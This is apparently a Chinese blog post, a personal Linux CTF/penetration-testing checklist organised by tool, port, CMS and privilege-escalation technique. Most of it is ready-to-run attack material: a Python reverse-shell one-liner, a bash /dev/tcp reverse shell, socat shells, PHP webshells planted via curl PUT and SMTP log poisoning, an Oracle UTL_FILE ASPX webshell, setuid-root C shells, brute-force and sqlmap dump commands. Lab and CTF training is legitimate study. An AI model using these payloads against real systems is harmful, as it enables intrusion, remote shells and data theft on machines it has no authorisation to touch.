【日常记录】CTF审查清单(linux)
2024-04-20 15:35:56
白刀破金甲
欢迎大佬补充
恳求大佬补充
感谢大佬补充
检查清单
- 白刀破金甲
- 一、常用工具
- 常用代理设置
- nmap
- curl
- dirb
- dirsearch
- gobuster
- nikto
- wpscan
- wget
- hashcat
- Binwalk (通用分析)
- wfuzz(模糊测试)
- crunch(生成字典)
- awk 正则匹配
- proxytunnel(横向)
- frp(横向)
- weevely(后门生成)
- finger(查存在用户,mail常用)
- sqlmap(跑数据库,OSCP禁用)
- hydra(爆破神器)
- john(爆破)
- ltrace(多用于缓冲区)
- hardening-check (检查文件安全机制)
- python反弹
- socat
- 防火墙中建立反弹shell
- 端口映射
- 解密
- 61:6c类
- eval(function(p,a,c,k,e,d) 类
- 莫斯/tap/rot13/仿射等密码
- 111rohit$01Dl0NQKtgfeL08fGrggi0
- fackespreadsheet
- rsa解密
- 一次性混淆密码( Vigenere Cipher)
- ROT13
- okk!
- 将16进制读回ascii
- 遇到大段类似于base64编码
- pk幻数
- 脑残解码[->++ +++++ +++<] >++++ +.-
- 二、具体服务类
- 21:ftp
- 22:ssh
- 25 :smtp
- u/t53 dns
- 79 finger
- 80/8080/443:web页面(s或非s)
- 110:pop3
- 135rpc
- 143 imap
- 139&445:smb
- udp161/162 snmp(造成信息泄漏)
- telnet
- 443 SSL
- udp 500 (ISAKMP)
- /etc/ipsec.secrets
- /etc/ipsec.conf
- udp 623 IPMI (是Bare Metal BMC automation的一个平台)
- 1521(Oracle)
- 3128或其他端口(squidhttp代理)
- nmap能扫出来但是close的端口
- NFS(对系统位数要求较为严苛)
- 开启关闭nfs
- 不同位系统之间bash传递
- 两种payload
- 4555 JAMES(POP3管理软件)
- 5800/5900 vnc
- 6667 src
- 若端口关闭
- 端口未关闭/打开后
- 6379 redis
- 6697/8067 irc
- 27017(mongodb)
- 三、CMS/搭建框架类
- wordpress
- drupal
- joomla
- apache
- gila cms
- nginx
- phpliteadmin(看版本)
- magento购物网站
- phpmyadmin(4.8.0)
- pi-hole
- phpinfo信息检索
- PlaySMS
- webmin <=1.910
- nostromo
- bludit3.9.2
- tomcat
- 管理器攻击(/host-manager/html)
- splunk
- pypi server
- com.ubuntu.USBCreator.conf
- Medusa httpd
- Mattermost
- Laravel v8 (PHP v7.4.18)
- IPMI (Bare Metal BMC automation的一个平台)
- zabbix
- (mogrify)ImageMagick以及一些套件(7.0.10-36)
- npm
- jamovi
- Bolt
- 四、突破点(非提权)
- 添加到临时环境变量
- node.js反弹shell
- 静态nmap
- 打开json文件
- 文件名命令注入(常见于mv操作)
- 破解非常规hash(例如非常长)
- chisel搭建隧道
- 搜索危险函数
- 存在ear重定向后执行
- tomcat的管理页面被代理走
- 运行snmp中枚举的进程(在低权进程不存在)
- 当ls -la后面有一个+
- wasm
- java-yaml反序列化
- 根据已知密码与其变种密码hash爆破
- java/jackson反弹端口
- enc后缀加密文件/.gnupg/其所属的gpg密钥环
- bsd系统
- curl带凭据访问
- curl强制执行get(多用于注入等)
- lua注入
- 批量发送邮件
- 爬去页面所有邮箱
- 生成短的ssh密钥
- xss测试
- 服务器由python建立
- 图片上传
- 打开jar
- 目录爆破(目前最好用的)
- 网页类似ping功能
- usb相关
- grep找到32位字符
- 挂载法
- X-Pi-hole(截到的包)
- 稳定终端
- steg隐写术
- 简单的端口反弹
- 监听icmp
- ssh隧道搭建
- 文件类
- 图片
- 视频
- 文件爆破
- 压缩包doc等文件
- 登录框
- 注册框
- 留言框
- 页面爆破无结果(只有默认页面)
- url无变化的变化页面
- 爆破id _rsa
- 内网中无隧道扫描
- 搭建隧道
- 批量解码
- 无线爆破
- js脚本审计
- 文件读取
- 流量分析
- pyc文件
- postgreaql
- swaks
- 漏扫之后网站崩
- iptables(端口fileter就可能存在)
- 绕过防火墙
- vnc提权
- MYSQL查询
- LFI
- 手工内网横向
- 内网穿越
- socat
- frp
- 文件上传混淆
- 网站源码拷贝(低频率)
- 前端需要关注的JS库
- 爆破压缩包
- rbash逃逸
- wap文件
- (未完善)node.js反序列化
- (未完善)ss-manager(目前遇到了一次,与js反序列化一起出现)
- WAF绕过
- 文字处理(违规字符导致的无法解码)
- JWT爆破
- 外网可访问的数据库页面
- cgi shellshock
- 五、突破点(提权)
- 手工提权信息查询
- chkrootkit提权
- (未完善)计划任务写入提权/高权限可执行文件
- 新建命令绕过无法使用的限制
- 脚本exec等执行命令中存在$path等变量
- 高权限.sh等文件可以输入或者选项
- 高权限py等文件可以输入或者选项,以及脚本命令执行时的夹带私货,一般常见于可执行ping命令
- $
- (未完善)find提权
- 新增root权限用户提权
- systemctl提权
- Lxc提权
- 方法一:拖镜像挂载root而后写命令到sudoers
- 方法二:简单快捷
- nmap提权
- 环境变量挟持提权
- 共享库提权
- 挟持环境变量提权
- pip提权
- docker提权
- 2375开放(外网直接打)
- 2375端口不开放(内网机器开搞)
- adm用户敏感信息枚举
- snmp提权(借助恶意快照包的安装实现)
- 计划任务压缩包
- ansible-playbook提权
- apt-get提权
- 存在env_keep+=XDG_CONFIG_HOME
- npm包挟持
- 六、小技巧
- 暴力拆解压缩包
- 快捷的稳定shell
- 一个简单的sh脚本
- 无python建立稳定shell
- 无wget下载文件
- curl
- nc
- 软连接建立(可以用来避免root目录的保护)
- 无nc的端口转发
- 基于计划任务的持久shell
- 缩减密码本
- 将加密rsa密钥转变成正常密钥(需要密码)
- (未完善)判断加密方式
- 七、(代完善)缓冲区溢出专题
- windows缓冲区溢出
- linux 64位
- (待完善)linux 64位(存在spawn)
- 格式字符串-缓冲区溢出提权
- 带预选项的格式化缓冲区溢出
- Return to libc(开启了nx)
- 八、数据库专题
- url sql注入
- mysql注入手动获取信息
- UDF提权
- mongodb正常查询方法
- mongodb脚本爆破
- nosql 注入检测
- 如果客户机中没有mysql客户端
- 如果是一个废shell
- sql注入模糊测试
- 九、需要特殊注意的二进制提权
- 关于不知用途的二进制文件
- journalctl
- 十、容器相关
- 查看ip
- 枚举docker漏洞
- 安装缺少包(docker)
- cap_dac_read_search滥用
一、常用工具
常用代理设置
proxychains4 -f /etc/proxychains4.conf
nmap
- 探测目标IP
nmap -sP 192.168.247.0/24
或
nmap -sn 192.168.247.0/24
全自动扫描
./nmapAutomator.sh --host 192.168.3.151 --type All一定要用这个扫一下
nmap -sT -p- --min-rate 10000 10.129.138.220
udp扫描
nmap -vvv -sU -o nmapudp 10.129.138.220 --max-retries 0
或者
nmap -sU --top-ports 10 -sV 10.129.228.106
具体udp
nmap -p 161,500 -sV -sU -sC 10.129.138.220
- 探测目标服务
nmap -sS -sV -A -T5 [IP]
以及
nmap [IP] -p-
curl
curl 【域名】
curl -v -X PUT -d '<?php system($_GET["cmd"]);?>' 【写入的文件】
curl -v -X OPTIONS 【域名】
curl --upload-file 【文件名】 -v --url 【写入的文件名】 -0
curl 192.168.247.129 -H "Cookie:lang=../upload/f3c697838a7e6b1c6406bb5b246e553f.gif"
上传:
curl --output - -b lang=../upload/0e.png
代替wget功能
curl -# -O http://192.168.253.138:8082/linpeas.sh
dirb
dirb 【域名】 【字典】
dirb 【域名】 【字典】 -x 【类型】
在扫的时候要注意观察url,如果存在特殊的,都具备的特殊字符,要加上一起扫
dirsearch
dirsearch -u http://192.168.247.162 -e php --proxy 【代理】 -t 【线程】
gobuster
gobuster dir -u 【域名】 -t 【线程数】 -w 【字典】 -s 【状态】 -x php,html常用的字典是dirbuster的字典
directory-list-2.3-small.txt、directory-list-2.3-medium.txt、directory-list-2.3-big.txt扫https
gobuster dir -k -u https://10.129.12.161 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 20
nikto
nikto -h 【IP】 -useproxy 【代理域名】
不挂代理就只有前面的
wpscan
正常扫描
wpscan --url 【域名】 -e u --api-token 【token】 --disable-tls-checks
枚举用户
wpscan --url http://wordy/ -eu
爆破
wpscan -U useer.txt -P passwords.txt --url http://wordy ---爆破
wget
- 下载https
wget --no-check-certificate 【https域名】
hashcat
1. 检验加密类型
hash-identifier
2. 解密MD5/加盐的直接在md5后面:[盐值]
hashcat -m 2611 --force rong.txt 【字典,通常是rockyou】Binwalk (通用分析)
通常用在对文件,图片的分析
Binwalk 【文件名】
wfuzz(模糊测试)
- 数据库爆破(mdb,db,sql,txt,lst)
2. 利用sqlmap共用字典
wfuzz -w /usr/share/sqlmap/data/txt/common-tables.txt --sc 200 http://192.168.247.166:9999/FUZZ.db3. 利用cruch生成的字典加上五个常用后缀进行双爆破
wfuzz -t 100 -w rong -w db.txt --sc=200 -c http://192.168.4.203:9999/FUZZ.FUZ2Z
- 账号密码爆破
wfuzz -c -z file,./user.txt -z file,./pass.txt -d 'user=FUZZ&pass=FUZ2Z&pin=22222' http://192.168.2.177:8888/login.php
- 目录爆破
wfuzz -c --hc=400,404 -z file,rong.txt http://192.168.149.131/exschmenuating/FUZZ.php
crunch(生成字典)
crunch 5 5 1234567890 > pin --生成5位数字码
crunch 1 4 abcdefghijklmnobqrstuvwxyz1234567890 > rong --猜解文件名
awk 正则匹配
https://www.runoob.com/linux/linux-comm-awk.html
awk -F'|' '{print $3}' 1122.txt > 2211.txt
proxytunnel(横向)
proxytunnel -p 10.211.55.38:3128 -d 127.0.0.1:22 -a 5566 kali本地5566端口
frp(横向)
- 修改frpc.ini
- 赋权执行frps
- 上传frpc以及frpc.ini
- 赋权执行frpc
./frps -c frps.ini
./frpc -c frpc.ini
gedit /etc/proxychains4.conf --本机(或者proxychains.conf )
最后一行加上:socks5 192.168.253.138 7777
weevely(后门生成)
weevely generate pass1234 rong.php
weevely http://192.168.247.142/test/rong.php p#ass#rong
finger(查存在用户,mail常用)
finger user@192.168.147.151
git clone https://github.com/Kan1shka9/Finger-User-Enumeration.git
cd Finger-User-Enumeration
然后该下sh文件IP:
./finger_enum_user.sh user.txt
sqlmap(跑数据库,OSCP禁用)
爆数据库
sqlmap -u "http://192.168.247.143/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --dbs --level=5 --risk=3
爆表
sqlmap -u "http://192.168.247.143/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --dbs --level=5 --risk=3 -D jabcd0cs --tables
爆字段
sqlmap -u "http://192.168.247.143/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --dbs --level=5 --risk=3 -D jabcd0cs --tables -T odm_user --columns
爆字段内容
sqlmap -u "http://192.168.247.143/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --dbs --level=5 --risk=3 -D jabcd0cs --tables -T odm_user --dump1)sqlmap带账号密码爆破
sqlmap -d 'mysql://root:H4u%QJ_H99@10.211.55.46:3306/Users' --dump -T users -D Users测试写入权限:
sqlmap -d 'mysql://root:H4u%QJ_H99@10.211.55.46:3306/Users' --current-user --is-dba
由于当前用户不是DBA,无法通过MySQL ROOT 帐户写入文件!
hydra(爆破神器)
wordlists 查询存在的list
爆破pop3
hydra -spop PORT -L USERNAME_LIST -P PASSWORD_LIST -e nsr -t 22 IP pop3
或者
hydra pop3://192.168.2.141 -L user.txt -P pass.txt爆破ftp
hydra 【ftp地址】 -L 【字典】 -P 【字典】
例如:hydra -l veronica -P rong.txt ftp://192.168.149.131爆破ssh
hydra -l 【用户名】 -P 【字典】 -t 5 -v -f 【IP】 ssh
或者
hydra ssh://192.168.2.141 -L user.txt -p "xxx"爆破web
hydra -L 1.txt -P 2.txt 172.20.10.8 http-post-form "POST头部信息:post体信息(^USER^^PASS^):错误信息"爆破postgresql
hydra -L /usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt -P /usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt -s 5432 127.0.0.1 postgres -vvvjohn(爆破)
111rohit$01Dl0NQKtgfeL08fGrggi0
这样的密码可以用john爆破
命令:john --wordlist=/usr/share/wordlists/rockyou.txt rong
命令:john --show rong
ltrace(多用于缓冲区)
如果文件打开需要ID或其他
ltrace ./agent //或许可以看到将你输入的东西与其他的一个东西比较
hardening-check (检查文件安全机制)
hardening-check ./xxx
python反弹
网站上python的不对,做一个更正
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.149.129",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'socat
防火墙中建立反弹shell
socat TCP-LISTEN:6666,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sanesocat FILE:`tty`,raw,echo=0 TCP:192.168.247.166:6666
端口映射
第一种:
socat TCP-LISTEN:8009,fork,reuseaddr TCP:10.0.3.3:8009 &socat TCP-LISTEN:xxxx 这里描述的当前掌握shell的主机
fork,reuseaddr TCP:10.0.3.3:8009 这个描述的是目标主机的端口和IP第二种:
内网本地端口映射外网
socat TCP-LISTEN:8888,fork TCP:127.0.0.1:80 &
socat TCP-LISTEN:9999,fork TCP:127.0.0.1:65334 &
端口转发:附加一个与号“&”在后台运行 socat 命令
127.0.0.1:65334是内网的主机使用这个命令,没有reuseaddr,因为reuseaddr代表开启服务端口,仅仅监听的话不需要加reuseaddr
解密
61:6c类
https://www.rapidtables.com/convert/number/hex-to-ascii.html
eval(function(p,a,c,k,e,d) 类
http://matthewfl.com/unPacker.html
莫斯/tap/rot13/仿射等密码
https://cryptii.com/
先选解码,再放数据
111rohit$01Dl0NQKtgfeL08fGrggi0
john爆破
fackespreadsheet
以下这种格式
Expenses
Software Licenses,$2.78
Maintenance,$68.87
Mortgage Interest,$70.35
Advertising,$9.78
Phone,$406.80
Insurance,$9.04
https://www.spammimic.com/decode.shtml
选择:Decode fake spreadsheet
rsa解密
p,q,e三个数值来源于给出的信息
def egcd(a, b):x,y, u,v = 0,1, 1,0while a != 0:q, r = b//a, b%am, n = x-u*q, y-v*qb,a, x,y, u,v = a,r, u,v, m,ngcd = breturn gcd, x, ydef main():p = q = e = ct = # compute nn = p * q# Compute phi(n)phi = (p - 1) * (q - 1)# Compute modular inverse of egcd, a, b = egcd(e, phi)d = aprint( "n: " + str(d) );# Decrypt ciphertextpt = pow(ct, d, n)print( "pt: " + str(pt) )if __name__ == "__main__":main()
会得到一个pt和n
然后进入python命令行
>>> pt =
>>> f"{pt:x}"
>>> bytes.fromhex(f"{pt:x}").decode()
一次性混淆密码( Vigenere Cipher)
https://www.braingle.com/brainteasers/codes/onetimepad.php
上面这个可以原文密文对照得出key,然后到下面网站选择 Vigenere Cipher
https://cryptii.com/
ROT13
echo [密文] | tr a-z n-za-m
okk!
全是?!的密码
https://www.dcode.fr/langage-ook
将16进制读回ascii
cat index.php | xxd -r -p
遇到大段类似于base64编码
cat 1.txt | base64 -d | xxd 先读回ascii
pk幻数
读回之后开头是pk
https://asecuritysite.com/forensics/magic
对应去找16进制前8位
脑残解码[->++ +++++ +++<] >++++ +.-
https://copy.sh/brainfuck/
二、具体服务类
21:ftp
普通登录格式: 用户名:密码@ftp地址:传送端口(默认21)
字典来源为web获取或者cewl
默认登陆
账号为anonymous,密码为空passive异常
在百度的基础上加一个bin,可以尝试
epsv4 off
以及passive
- 如果ftp是web目录
直接写后门
用put传文件
22:ssh
普通登陆格式:ssh -i [id_rsa] -p [port] [user]@[ip] "[command]"
- cewl爬取密码本
cewl 【域名】 > 1.txt
已知账号的密码爆破
hydra爆破登陆受限的ssh
通常-t执行命令,但是需要无密码或者证书登录ssh毒化
ssh-keygen ---全部回车
cd /root/.ssh
cat id_rsa.pub ---里面的值复制
在mnt目录下创建:mkdir .ssh
cd .ssh 进去后写入:
echo '【id-rsa】' > authorized_keys
- rbash逃逸
本质上还是借助了ssh命令执行
ssh mindy@192.168.247.167 "export TERM=xterm; python -c 'import pty; pty.spawn(\"/bin/sh\")'"
- ssh端口转发
127.0.0.1:5901 是目标主机
-L 5901 是自己端口
ssh -L 5901:127.0.0.1:5901 charix@10.129.1.254
- 基于ssh的scp文件传输
scp charix@10.10.10.84:secret.zip .
25 :smtp
- 后门写入
如果可以访问到log或者邮件内容文件
敏感目录:/var/log/mail
nc [ip] [port] 或者:telnet [ip] [port]
1)HELO [user] ---向服务器标识用户身份
2)MAIL FROM:"[user] <?php echo shell_exec($_GET['cmd']);?>" ---MAIL FROM:发件人
3)RCPT TO:[reciver] ---RCPT TO:收件人
4)DATA ---开始编辑邮件内容
5). ---输入点代表编辑结束
6)http://192.168.56.102/turing-bolo/bolo.php?bolo=../../../../var/log/mail&cmd=id
- 敏感信息枚举
smtp所造成的信息泄露来获取一定的存在用户
smtp-user-enum -M VRFY -U [字典] -t 192.168.247.151
-M ---用于猜测用户名 EXPN、VRFY 或 RCPT 的方法(默认值:VRFY)
-U ---通过 smtp 服务检查的用户名文件
-t ---host 服务器主机运行 smtp 服务
字典是这个,也可以选取类似:
/usr/share/metasploit-framework/data/wordlists/unix_users.txt
u/t53 dns
dnsrecon -r 10.10.10.0/24 -n 10.10.10.13
添加入host
再根据刚才得到的第一个ns1解析,去掉ns1执行下面的命令
两种任选一个
host -l -a cronos.htb 10.129.227.211
dig axfr cronos.htb @10.129.227.21179 finger
枚举脚本
pentestmonkey.net/tools/finger-user-enum/finger-user-enum-1.0.tar.gz
枚举用户
./finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 10.129.16.126
连接用ssh等即可,常常一起出现
80/8080/443:web页面(s或非s)
如果只是静态页面的(已经遇到的是nginx)
注意看nmap扫出来的信息,有没有下面这样的,如果有就要加host并且直接访问域名而非ip
commonName=brainfuck.htb/organizationName=Brainfuck
Ltd./stateOrProvinceName=Attica/countryName=GR | Subject Alternative
Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb
- 弱逻辑登陆页面爆破
hrdra/burpsuit - 弱口令登录
admin等 - 已知cms
searchsploit 【cms版本】
或者谷歌
- 页面源码信息泄露
- 页面源码特殊的js文件,例如app.js
- 做本地host
域名通常根据浏览器的跳转或者提示来判定
gedit /etc/hosts
- 目录爆破
使用工具curl等
110:pop3
- hydra爆破
- 登陆方式
telnet x.x.x.x 110
user xxxx
pass xxxx查看邮件目录
list
retr 1
135rpc
rpcclient -U “” -N [IP]
enumdomusers 枚举用户
enumprinters 枚举打印机
看能不能有枚举用户
143 imap
evolution客户端链接
编辑添加账号即可
139&445:smb
smb如果能进web页面那就上传后门,然后直接拿shell
目前遇到了samba smbd,可以扫描获取敏感信息,可能会发现匿名登录,进而信息枚举
通常检验过程(存在信息泄漏,或者空绑定,可以枚举出所有用户)
smbclient -N -L //[IP] 看看有没有空绑定,如果有的话可以利用
enum4linux -v 10.10.10.161 来枚举出包括所有用户信息的数据
单独枚举用户:
enum4linux -U 192.168.3.142扫描是否存在漏洞
nmap -v --script smb-enum-* -p445 192.168.3.141
扫描漏洞(第一次使用在了windows)
nmap -p 445 --script vuln 10.129.6.213登录
smbclient //【ip】/【用户】
smbclient \\\\[ip]\\[share name]
smbclient //10.129.65.80/new-site -U tyler 这是登陆带组的用户
这两种命令都能用来着密码爆破
./acccheck.pl -t 192.168.3.142 -u smb -v查看共享目录
smbclient -L 10.10.10.161
smbmap -u 'smb' -p '' -H 192.168.3.142
查看共享组
smbclient -N //10.10.10.134/backups 如果需要改密码
smbpasswd -r 10.10.10.193 tlavel 即可
udp161/162 snmp(造成信息泄漏)
先nmap扫(在上面)
而后再找几个信息,例如:
1. 用来识别用的什么字符串(public或其他)
onesixtyone 10.10.10.20 -c /usr/share/doc/onesixtyone/dict.txt
161/udp open snmp SNMPv1 server (public)‘
命令示例;snmpwalk -c public -v 1 10.129.138.220 > snmp-public.txt利用snmp执行高权限进程在下面
telnet
主要打法,依托tcpdump检验能否执行命令,而后直接反弹shell
sudo tcpdump ip proto \\icmp -i tun0 本机开启tcpdump.RUN ping <ip fo your machine> -c 1 靶机检验能否执行命令
利用如下方式生成payloadmsfvenom -p cmd/unix/reverse_netcat lhost= <你机器的ip> lport=4444 R
443 SSL
可能会出现部分敏感目录403的情况
切换成https即可
udp 500 (ISAKMP)
ike-scan 10.129.138.220 -M --探寻属性
/etc/ipsec.conf和 /etc/ipsec.secrets ---修改配置修改完了连接即可
ipsec restart
ipsec up conceal
/etc/ipsec.secrets
%any : PSK "Dudecake1!"
/etc/ipsec.conf
改参数
config setupcharondebug="all"uniqueids=yesstrictcrlpolicy=noconn concealauthby=secretauto=addike=3des-sha1-modp1024!esp=3des-sha1!type=transportkeyexchange=ikev1left=10.10.14.15right=10.10.10.116rightsubnet=10.10.10.116[tcp]
udp 623 IPMI (是Bare Metal BMC automation的一个平台)
详细利用在下文,可以获取hash
1521(Oracle)
使用odat工具
1. 枚举id
odat sidguesser -s 10.129.7.193
2. 查看是否可打
odat tnspoison -s 10.10.10.82 -d XE --test-module
xe是刚才枚举出的id
3. 爆破密码
odat passwordguesser -d XE -s 10.129.7.193 -p 1521 --accounts-file /usr/share/odat/accounts/accounts.txt
4. 登陆枚举
用native或者sqlplus
sqlplus scott/tiger@10.10.10.82:1521/XE as sysdba
5. webshell/payload
--------------------------------------
declaref utl_file.file_type;s varchar(5000) := '<%@ Page Language="C#" Debug="true" Trace="false" %><%@ Import Namespace="System.Diagnostics" %><%@ Import Namespace="System.IO" %><script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){}string ExcuteCmd(string arg){ProcessStartInfo psi = new ProcessStartInfo();psi.FileName = "cmd.exe";psi.Arguments = "/c "+arg;psi.RedirectStandardOutput = true;psi.UseShellExecute = false;Process p = Process.Start(psi);StreamReader stmrdr = p.StandardOutput;string s = stmrdr.ReadToEnd();stmrdr.Close();return s;}void cmdExe_Click(object sender, System.EventArgs e){Response.Write("<pre>");Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));Response.Write("</pre>");}</script><HTML><body ><form id="cmd" method="post" runat="server"><asp:TextBox id="txtArg" runat="server" Width="250px"></asp:TextBox><asp:Button id="testing" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button><asp:Label id="lblText" runat="server">Command:</asp:Label></form></body></HTML>';
beginf:= utl_file.fopen('/inetpub/wwwroot', 'peng.aspx', 'W');utl_file.put_line(f,s);utl_file.fclose(f);
end;
/
------------------------------------------
6. 然后url直接访问10.10.10.82/peng.aspx即可获取webshell,后续借助nishang(win)就可以反弹shell
3128或其他端口(squidhttp代理)
需要挂代理让流量走这个端口
使用一些工具扫描的时候就需要注意了
nmap能扫出来但是close的端口
在已经获得shell的机器中,可以通过如下来找配置文件,知道端口顺序
find / -name "knockd.conf" 2>/dev/null
可能存在端口敲震
knock 10.211.55.36 7482 8279 9467
nmap 10.211.55.36 -p7788
NFS(对系统位数要求较为严苛)
开启关闭nfs
sudo /usr/local/sbin/nfs status
sudo /usr/local/sbin/nfs start
ps aux | grep nfs
显示挂载目录:showmount -e 192.168.253.229mkdir nfs ---创建个挂载目录
mount -t nfs 【IP】:【目标路径】 【自身路径】
umount /tmp/nfs ---全部挂载删除创建专门权限用户useradd -u 2008 vulnix这个我用在了windows上
mount -t cifs //10.10.10.134/backups /mnt -o user=,password=
不同位系统之间bash传递
需要利用NFS,进行bash的传递,权限的混淆
1)在vulnix
ssh vulnix@192.168.253.167
cp /bin/bash .2)在kali执行
cat bash > rong
chmod 4777 rong
本地计算机的/bin/bash复制到/tmp/nfs并赋权
./bash -p ---保留原始的shell权限两种payload
-------------------------------------------
#include <stdlib.h>
int main() { setuid(0); setgid(0); system("/bin/sh"); }
----------------------------------
nano写入shell.c文件
gcc shell.c -o shell
chmod 4777 shell
./shell
成功提权!------------------------------------
#include <stdio.h>int main()
{setuid(0);setgid(0);system("/bin/sh");
}
4555 JAMES(POP3管理软件)
nc x.x.x.x 4555
账号密码默认是root
可以查看用户,也可以修改用户密码,而后pop3登录邮件枚举
5800/5900 vnc
见vnc提权部分
6667 src
若端口关闭
常由于防火墙限制,需要在拿到低权shell后修改防火墙规则
iptables:
sudo /sbin/iptables -L --查看规则
sudo /sbin/iptables --flush ---全放行
端口未关闭/打开后
nmap 192.168.253.180 -p6667(可以看到server信息)
find / -name 【server】* 2>/dev/null 应该会找到存在信息的目录
目录可能会存在log以及cfg文件,其中可能会有频道信息(channels)
irssi -c 192.168.247.164 -p 6667 -n wallabyschat登陆服务器/list查看频道/j wallabyschat加入频道- 看到
[@waldo] [ wallabysbot]这样的数个用户 /whois waldo查看用户信息,可能会出现使用的框架信息,在ircname行- 这个时候的框架信息应该会与之前的find(server)一致,其中会有modules,里面有配置信息**(这一步也可以暂时忽略)**
/j wallabyschat重新加入频道.run ls执行命令,可能会存在用户验证who或者ps -aux | grep waldo查找对应用户进行的进程号kill 733或者其他命令执行方式执行杀死进程命令/nick waldo给自己改名.run bash -c 'bash -i >& /dev/tcp/192.168.247.129/9090 0>&1'命令执行
6379 redis
redis-cli -h 10.129.2.1
【日常记录】CTF审查清单(linux)相关推荐
- 日常记录:虚拟机linux里面nat模式联网
1.虚拟机设置nat模式,使用nat模式的网卡 选择之后,可以看到网段地址.然后linux选择nat模式连接网络. 2.启动linux系统,进入/etc/sysconfig/network-scrip ...
- 日常记录:虚拟机linux只有lo网卡怎么办?
背景 今天,虚拟机vmware一直蓝屏,从12换成10,最后换成16版本没有蓝屏了,但是linux不能重启,只能重装了.不过,重装之后,进入/etc/sysconfig/network-scripts ...
- 日常记录20210102
日常记录20210102 记录内容 1.部分src平台的使用感受 2.今天找edu审洞的莫言问了一下cnvd通用的事 3.挖洞记录.思路 4.日常搜索语法 百度语法 谷歌语法 个人常用语法 5.lin ...
- steamdb免费游戏信息爬取(不是爬虫教学,日常记录,贼不工整,不喜勿看)
日常记录而已,不是特别工整,不喜勿喷,不喜勿看. 1. 数据来源于steamdb, 目标网址:https://steamdb.info/upcoming/free/ 2. 由于网址存在反爬措施,在没有 ...
- 日常工作问题解决:centos/linux系统如何检测端口是否打开
日常工作问题解决:centos/linux系统如何检测端口是否打开 参考文章: (1)日常工作问题解决:centos/linux系统如何检测端口是否打开 (2)https://www.cnblogs. ...
- 【日常记录】解决‘GLIBC_2.34‘ not found,并且gcc制定glibc版本编译
小荣的日常记录
- 日常记录:java启动参数 -javaagent的使用,应用启动前添加代理包并且注册Mbean
前言 有时候是不是很苦恼想在不修改别人的应用(或者统一处理所有的应用)情况下如何添加额外功能?那么-javaagent启动参数就能处理这个问题. 还有上一章讲的(日常记录:java 注册以及获取MBe ...
- 【日常记录】泰阿单兵武器库的下载与安装
小荣的日常记录 `
- [日常记录]红绿双基色LED显示屏不同角度呈现不同颜色
红绿双色LED显示屏不同角度呈现不同颜色 日常记录 日常记录 1.问题现象:设备使用的红绿双基色LED显示屏,在做环境试验时,当设置显示为黄色时(即红绿LED同时亮起),从温箱外部观察发现两块屏幕显示 ...
最新文章
- 导师:顶会论文3天都复现不出来?你退学吧!
- html5基础知识文档,HTML5基础知识(1)
- arthas使用示例:profiler火焰图(CPU)
- 2022MWC上海预计6月29号开幕
- for mew歌词 shell_求shell for mew的中文歌词
- 牛客小白月赛9 A签到(乘法逆元)
- java rx_史上最浅显易懂的RxJava入门教程
- webpack+Vue2.0项目基础工程文件配置
- oracle同音字模糊查询,已释甲骨文会意字研究.pdf
- matlab显示图像只有一半,我去噪后图像为什么只显示一半
- 14. Floyd + 朴素版Dijkstra
- 百度网盘链接怎么同步更新、百度网盘链接同步、百度网盘分享同步更新、百度网盘怎么同步更新、百度网盘资源同步更新、百度网盘分享文件同步更新、百度网盘好友分享同步更新、百度网盘共享文件同步更新...
- 王石:中国楼市泡沫必破 目前只是时间问题
- 网络正常连接,浏览器无法打开网页的解决方法
- listview下拉刷新上拉加载扩展(三)-仿最新版美团外卖
- Weakly Supervised Video Salient Object Detection
- 硬件开发者之路之-----运放共模电压的解释
- Pandas处理日期数据的常见操作集锦
- 蓝海、红海指的是什么
- PubMed(丁香)英汉词典爬取
热门文章